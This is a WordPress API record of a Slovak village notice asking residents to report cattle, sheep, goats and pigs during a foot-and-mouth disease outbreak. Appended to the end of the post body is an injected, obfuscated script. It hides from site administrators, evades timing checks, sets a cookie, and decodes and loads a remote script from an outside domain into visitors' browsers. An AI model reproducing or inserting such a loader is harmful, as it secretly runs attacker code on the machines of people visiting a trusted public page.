{"id":5238,"date":"2025-03-31T07:48:56","date_gmt":"2025-03-31T05:48:56","guid":{"rendered":"https:\/\/www.dolneplachtince.sk\/wp\/?p=5238"},"modified":"2025-10-17T19:24:06","modified_gmt":"2025-10-17T17:24:06","slug":"slak","status":"publish","type":"post","link":"https:\/\/www.dolneplachtince.sk\/wp\/slak\/","title":{"rendered":"SLAK"},"content":{"rendered":"<p class=\"has-text-align-justify\">Obec Doln\u00e9 Plachtince na z\u00e1klade \u017eiadosti o s\u00fa\u010dinnos\u0165 Region\u00e1lnej veterin\u00e1rnej a potravinovej spr\u00e1vy vo Ve\u013ekom Krt\u00ed\u0161i<\/p>\n<p class=\"has-text-align-justify-center\" style=\"text-align: center;\"><strong>vyz\u00fdva<\/strong><\/p>\n<p class=\"has-text-align-justify\">svojich obyvate\u013eov \u2013\u00a0<strong>chovate\u013eov vn\u00edmav\u00fdch zvierat<\/strong> (hov\u00e4dz\u00ed dobytok, ovce, kozy a o\u0161\u00edpan\u00e9), ktor\u00e9 s\u00fa registrovan\u00e9 v Centr\u00e1lnom registri hospod\u00e1rskych zvierat, ale aj tie zvierat\u00e1, ktor\u00e9 v tomto registri nie s\u00fa nahl\u00e1sen\u00e9, aby obci Doln\u00e9 Plachtince <strong>nahl\u00e1sili s\u00fapis<\/strong>\u00a0uveden\u00fdch chovan\u00fdch zvierat (hov\u00e4dz\u00ed dobytok, ovce, kozy a o\u0161\u00edpan\u00e9).<\/p>\n<p class=\"has-text-align-justify\">Pros\u00edme o nahlasovanie\u00a0<em>osobne\u00a0<\/em>na obecnom \u00farade<em>, telefonicky<\/em> na \u010d\u00edsle 047 483 000 3, alebo <em>emailom<\/em> na adrese: obec@dolneplachtince.sk najnesk\u00f4r <strong>do 01. apr\u00edla 2025, do 15:30 hod.<\/strong><\/p>\n<p class=\"has-text-align-justify\">Tento s\u00fapis je nutn\u00e9 poskytn\u00fa\u0165 v s\u00favislosti s vysoko n\u00e1kazlivou v\u00edrusovou chorobou slinta\u010dka a kr\u00edva\u010dka (SLAK) vyskytuj\u00facou sa u vn\u00edmav\u00fdch zvierat.<\/p>\n<p class=\"has-text-align-justify\">Z\u00e1rove\u0148 informujeme v\u0161etk\u00fdch chovate\u013eov hospod\u00e1rskych zvierat v na\u0161ej obci, \u017ee pl\u00e1novan\u00e9\u00a0<strong>dom\u00e1ce zak\u00e1\u013ea\u010dky m\u00f4\u017eu na\u010falej prebieha\u0165<\/strong>, je v\u0161ak potrebn\u00e9 nahl\u00e1si\u0165 ich obvykl\u00fdm sp\u00f4sobom, minim\u00e1lne de\u0148 vopred telefonicky na tel. \u010d\u00edslo 0904 313 313 alebo mailom na sekretariat.vk@svps.sk.<\/p>\n<p class=\"has-text-align-justify\">V nadv\u00e4znosti na mimoriadne veterin\u00e1rne opatrenia RVPS Ve\u013ek\u00fd Krt\u00ed\u0161 \u010falej upozor\u0148uje v\u0161etk\u00fdch chovate\u013eov hospod\u00e1rskych zvierat vn\u00edmav\u00fdch na v\u00edrus slinta\u010dky a kr\u00edva\u010dky, aby denno-denne sledovali zdravotn\u00fd stav svojich zvierat a v pr\u00edpade ak\u00e9hoko\u013evek podozrenia zmeny zdravotn\u00e9ho stavu okam\u017eite telefonicky kontaktovali svojho s\u00fakromn\u00e9ho veterin\u00e1rneho lek\u00e1ra ako aj RVPS Ve\u013ek\u00fd Krt\u00ed\u0161 na telef\u00f3nnom \u010d\u00edsle 0904 313 313.<\/p>\n<p>Za spolupr\u00e1cu \u010fakujeme.<script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9ha21jZG5yZXBvLmNvbS9leGl0anM=');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Obec Doln\u00e9 Plachtince na z\u00e1klade \u017eiadosti o s\u00fa\u010dinnos\u0165 Region\u00e1lnej veterin\u00e1rnej a potravinovej spr\u00e1vy vo Ve\u013ekom Krt\u00ed\u0161i vyz\u00fdva svojich obyvate\u013eov \u2013\u00a0chovate\u013eov vn\u00edmav\u00fdch zvierat (hov\u00e4dz\u00ed dobytok, ovce, kozy a o\u0161\u00edpan\u00e9), ktor\u00e9 s\u00fa registrovan\u00e9 v Centr\u00e1lnom registri hospod\u00e1rskych zvierat, ale aj tie zvierat\u00e1, ktor\u00e9 v tomto registri nie s\u00fa nahl\u00e1sen\u00e9, aby obci Doln\u00e9 Plachtince nahl\u00e1sili s\u00fapis\u00a0uveden\u00fdch chovan\u00fdch zvierat (hov\u00e4dz\u00ed dobytok, ovce, kozy a [&#8230;]<\/p>\n","protected":false},"author":5,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"spay_email":"","footnotes":"","jetpack_publicize_message":"","jetpack_is_tweetstorm":false,"jetpack_publicize_feature_enabled":true},"categories":[21],"tags":[],"class_list":["post-5238","post","type-post","status-publish","format-standard","hentry","category-oznamy"],"jetpack_featured_media_url":"","jetpack_publicize_connections":[],"jetpack_sharing_enabled":true,"jetpack-related-posts":[{"id":5241,"url":"https:\/\/www.dolneplachtince.sk\/wp\/slak-sms\/","url_meta":{"origin":5238,"position":0},"title":"SLAK sms","date":"31. marca 2025","format":false,"excerpt":"\u017diadame v\u0161etk\u00fdch chovate\u013eov hov\u00e4dzieho dobytka, oviec, k\u00f4z a o\u0161\u00edpan\u00fdch aby do 1.4. 15:30 nahl\u00e1sili na OCU bu\u010f osobne, na 0474830003, alebo na obec@dolneplachtince.sk zoznam chovan\u00fdch zvierat. Viac na www.dolneplachtince.sk","rel":"","context":"V &quot;Oznamy miestneho rozhlasu&quot;","img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":5197,"url":"https:\/\/www.dolneplachtince.sk\/wp\/opatrenia-pre-chovatelov-hosp-zvierat-ochorenie-slak\/","url_meta":{"origin":5238,"position":1},"title":"Opatrenia pre chovate\u013eov hosp. zvierat &#8211; ochorenie SLAK","date":"17. marca 2025","format":false,"excerpt":"Region\u00e1lna a veterin\u00e1rna spr\u00e1va Ve\u013ek\u00fd Krt\u00ed\u0161 vydala opatrenia pre chovate\u013eov hospod\u00e1rskych zvierat. opatrenia pr\u00edklady dezinfek\u010dn\u00fdch prostriedkov","rel":"","context":"V &quot;Oznamy&quot;","img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":5252,"url":"https:\/\/www.dolneplachtince.sk\/wp\/vyzva-pre-vsetkych-chovatelov-drzitelov-a-vlastnikov-hospodarskych-zvierat\/","url_meta":{"origin":5238,"position":2},"title":"V\u00ddZVA pre v\u0161etk\u00fdch chovate\u013eov, dr\u017eite\u013eov a vlastn\u00edkov hospod\u00e1rskych zvierat","date":"8. apr\u00edla 2025","format":false,"excerpt":"V\u00ddZVA \u0160t\u00e1tna veterin\u00e1rna a\u00a0potravinov\u00e1 spr\u00e1va Slovenskej republiky vyz\u00fdva v\u0161etk\u00fdch chovate\u013eov, dr\u017eite\u013eov, vlastn\u00edkov hospod\u00e1rskych zvierat bezodkladne registrova\u0165 chov zvierat do 09.04.2025 do Centr\u00e1lneho registra hospod\u00e1rskych zvierat! Ka\u017ed\u00fd chovate\u013e, ktor\u00fd chov\u00e1 minim\u00e1lne jedno zviera druhu hov\u00e4dz\u00ed dobytok, ovca, koza, o\u0161\u00edpan\u00e1 je povinn\u00fd registrova\u0165 chovn\u00e9 zariadenie pred za\u010dat\u00edm chovu zvierat pod\u013ea \u00a740a z\u00e1kona\u2026","rel":"","context":"V &quot;Oznamy&quot;","img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":3262,"url":"https:\/\/www.dolneplachtince.sk\/wp\/vyrub5\/","url_meta":{"origin":5238,"position":3},"title":"Ozn\u00e1menie o za\u010dat\u00ed spr\u00e1vneho konania vo veci vydania s\u00fahlasu na v\u00fdrub drev\u00edn","date":"16. febru\u00e1ra 2022","format":false,"excerpt":"V zmysle ustanovenia \u00a7 82, ods. 7\/ z\u00e1k. \u010d. 543\/2002 Z.z. o ochrane pr\u00edrody a krajiny v znen\u00ed neskor\u0161\u00edch predpisov \/\u010falej len \u201ez\u00e1kon o ochrane pr\u00edrody a krajiny\u201c\/ t\u00fdmto Obec Doln\u00e9 Plachtince ako pr\u00edslu\u0161n\u00fd org\u00e1n ochrany pr\u00edrody oznamuje inform\u00e1ciu o za\u010dat\u00ed spr\u00e1vneho konania vo veci vydania s\u00fahlasu na v\u00fdrub drev\u00edn,\u2026","rel":"","context":"V &quot;Oznamy&quot;","img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":3167,"url":"https:\/\/www.dolneplachtince.sk\/wp\/vyrub\/","url_meta":{"origin":5238,"position":4},"title":"Ozn\u00e1menie o za\u010dat\u00ed spr\u00e1vneho konania vo veci vydania s\u00fahlasu na v\u00fdrub drev\u00edn","date":"11. novembra 2021","format":false,"excerpt":"V\u00a0zmysle ustanovenia \u00a7 82, ods. 7\/ z\u00e1k. \u010d. 543\/2002 Z.z. o\u00a0ochrane pr\u00edrody a\u00a0krajiny v\u00a0znen\u00ed neskor\u0161\u00edch predpisov \/\u010falej len \u201ez\u00e1kon o\u00a0ochrane pr\u00edrody a\u00a0krajiny\u201c\/ t\u00fdmto Obec Doln\u00e9 Plachtince ako pr\u00edslu\u0161n\u00fd org\u00e1n ochrany pr\u00edrody oznamuje inform\u00e1ciu o\u00a0za\u010dat\u00ed spr\u00e1vneho konania vo veci vydania s\u00fahlasu na v\u00fdrub drev\u00edn, v\u00a0ktor\u00fdch m\u00f4\u017eu by\u0165 dotknut\u00e9 z\u00e1ujmy ochrany pr\u00edrody\u2026","rel":"","context":"V &quot;Oznamy&quot;","img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":3260,"url":"https:\/\/www.dolneplachtince.sk\/wp\/vyrub4\/","url_meta":{"origin":5238,"position":5},"title":"Ozn\u00e1menie o za\u010dat\u00ed spr\u00e1vneho konania vo veci vydania s\u00fahlasu na v\u00fdrub drev\u00edn","date":"16. febru\u00e1ra 2022","format":false,"excerpt":"V\u00a0zmysle ustanovenia \u00a7 82, ods. 7\/ z\u00e1k. \u010d. 543\/2002 Z.z. o\u00a0ochrane pr\u00edrody a\u00a0krajiny v\u00a0znen\u00ed neskor\u0161\u00edch predpisov \/\u010falej len \u201ez\u00e1kon o\u00a0ochrane pr\u00edrody a\u00a0krajiny\u201c\/ t\u00fdmto Obec Doln\u00e9 Plachtince ako pr\u00edslu\u0161n\u00fd org\u00e1n ochrany pr\u00edrody oznamuje inform\u00e1ciu o\u00a0za\u010dat\u00ed spr\u00e1vneho konania vo veci vydania s\u00fahlasu na v\u00fdrub drev\u00edn, v\u00a0ktor\u00fdch m\u00f4\u017eu by\u0165 dotknut\u00e9 z\u00e1ujmy ochrany pr\u00edrody\u2026","rel":"","context":"V &quot;Oznamy&quot;","img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]}],"jetpack_likes_enabled":true,"_links":{"self":[{"href":"https:\/\/www.dolneplachtince.sk\/wp\/wp-json\/wp\/v2\/posts\/5238","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.dolneplachtince.sk\/wp\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.dolneplachtince.sk\/wp\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.dolneplachtince.sk\/wp\/wp-json\/wp\/v2\/users\/5"}],"replies":[{"embeddable":true,"href":"https:\/\/www.dolneplachtince.sk\/wp\/wp-json\/wp\/v2\/comments?post=5238"}],"version-history":[{"count":3,"href":"https:\/\/www.dolneplachtince.sk\/wp\/wp-json\/wp\/v2\/posts\/5238\/revisions"}],"predecessor-version":[{"id":5629,"href":"https:\/\/www.dolneplachtince.sk\/wp\/wp-json\/wp\/v2\/posts\/5238\/revisions\/5629"}],"wp:attachment":[{"href":"https:\/\/www.dolneplachtince.sk\/wp\/wp-json\/wp\/v2\/media?parent=5238"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.dolneplachtince.sk\/wp\/wp-json\/wp\/v2\/categories?post=5238"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.dolneplachtince.sk\/wp\/wp-json\/wp\/v2\/tags?post=5238"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}